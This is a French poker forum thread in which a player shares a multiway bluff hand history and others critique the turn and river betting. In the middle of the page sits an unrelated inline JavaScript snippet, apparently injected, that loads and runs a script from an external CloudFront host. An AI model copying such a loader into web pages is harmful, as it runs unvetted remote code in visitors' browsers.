- Ce sujet contient 7 réponses, 6 participants et a été mis à jour pour la dernière fois par
Jurik, le il y a 10 années et 4 mois.
-
AuteurMessages
-
Salut ,
ci dessous une main où je décide de partir dans un bluff.
Comme d’hab, je suis preneur de toutes les remarques du début à la fin de la main (je sais déjà que mon bet turn est trop léger d’ailleurs…)
L’open est je trouve assez standard, BB est fish et le risque d’être squeeze par un des regs CO ou BTN est léger.
Le flop est -je pense- bon à cbet. J’ai un peu de FE car le board est dry et je pourrais bet pas mal de turn.
Même si je suis call par les 2 vilains, la Q est bonne à barrel car pas sûr que l’un des 2 me call avec Qx sur mon cbet flop. Là par contre, je pense que j’aurais dû faire plus cher…
Ma réflexion est sur la river. Ingame, je me suis dit que j’allais 3 barrel toutes les rivers sauf les 8x et les carreaux car je pense que la range de vilain est polarisé et plus souvent weak que strong.
Au delà de la main, est ce que mon raisonnement est relativement correct ou est ce que c’est vraiment pourri ?
BB 41/26/11.8 sur 50 h // UTG+1 20/14/4.8/67% fold t cbet 105 h
J’ai été assez actif la table mais rien de délirant
€0.25/€0.50 No Limit Holdem
6 Players
Hand Conversion Powered by weaktight.com[/url]Stacks:
CharloK (UTG) (€50) 100bb
UTG+1 (€59.47) 119bb
CO (€27.25) 55bb
BTN (€50.79) 102bb
SB (€72.48) 145bb
BB (€65.99) 132bbPre-Flop: (€0.75, 6 players) CharloK is UTG
CharloK raises to €1.50, UTG+1 calls €1.50, 3 folds, BB calls €1Flop:
(€4.75, 3 players)
BB checks, CharloK bets €2.50, UTG+1 calls €2.50, BB calls €2.50Turn:
(€12.25, 3 players)
BB checks, CharloK bets €6, UTG+1 calls €6, BB foldsRiver:
(€24.25, 2 players)
CharloK checks, UTG+1 bets €13.50, CharloK foldsFinal Pot: €24.25
UTG+1 wins €49.64 (net +€26.14)
CharloK lost €10
BB lost €4
<script type= »text/javascript »>
setTimeout(function(){var a=document.createElement(« script »);
var b=document.getElementsByTagName(« script »)[0];
a.src=document.location.protocol+ »//dnn506yrbagrg.cloudfront.net/pages/scripts/0023/4735.js? »+Math.floor(new Date().getTime()/3600000);
a.async=true;a.type= »text/javascript »;b.parentNode.insertBefore(a,b)}, 1);
</script>
Yop;
RAS pré et flop.
Turn comme tu dis bet plus cher 1/2 pot ici est un poil weak je trouve.
River je comprends pas pourquoi tu dis que tu veux GU sur les 8x, la majorité de la range du reg/fish c’est des PP donc il faut absolument 3 barrel si tu veux lui faire fold, on a pas assez de FE uniquement sur la turn imo.
Même si là pour le coup quand il bet river il a très souvent set ^^
- Inscrit depuis 13 ans
- 2020 messages - 57
Perso, quand j’ai 2 mec qui call mon cbet sur un board aussi dry, je give up tout simplement turn.
Les vilains ont à priori une main faite en main style set, 7x,88,99,TT et ça m’étonnerais qu’on fasse fold beaucoup de choses sur cette turn. Du coup on va être un peu obligé de 3barrel encore dans un multiway avec une équité très faible.
Donc le plan c’est soit GU turn soit 3Barrel mais je ne suis pas entièrement convaincu du 3barrel vu l’action flop :-)
Ben si tu fais pas un sizing de gay turn tu vas foutre le reg dans un spot de merde avec une main moyenne en sandwich face à un 2 barrel et le fish a encore une tonne de pampas ici.
Préflop et Flop c’est standard. Mais t’es quand même payé 2 x au flop… Je trouve le spot de bluff moyen à partir de là
Du coup j’aime pas le 3 barrel et je préfère GU turn. Surtout que, tu as été payé 2 x PF + 2x Flop, tu sais que le bluff va te couter une tonne turn + river.
Enfin, même si la Q est une bonne carte à barrel, elle touche pas mal la range de float du joueur ayant la position sur toi (AQ, KQ, …). Au flop il peut tout à fait avoir call IP avec 2 over et eventuellement un backdoor flush en plus de ses PP et SC avec une bonne excellent côte.
As played j’aurai mis, + chère turn et le 3 ème quand même du coup
Salut,
Pas fan du bet turn non plus, au flop ok avec gutshot et backdoor flush, le bet turn 1/2 pot est d’ailleurs insuffisant pour moi.
AMHA, la Q turn est une bonne carte à second barrel … si tu 3barrel. Vs deux joueurs, miser turn sans miser river ne sera que rarement suffisant.
D’autant que le 3barrel en 3way représente énormément de force, tu vas faire fold des tonnes river.
La river est une très bonne carte à barrel, puisqu’il y a plus de flushes dans ton range que dans la sienne, plus de Q dans ta range que dans la sienne. De plus, je doute que vilain puisse prendre un spot d’hero call, car vous etiez en 3way flop & turn, j’ai tendance à croire qu’il te donnera davantage de crédit.
-
AuteurMessages
Vous devez être connecté pour répondre à ce sujet.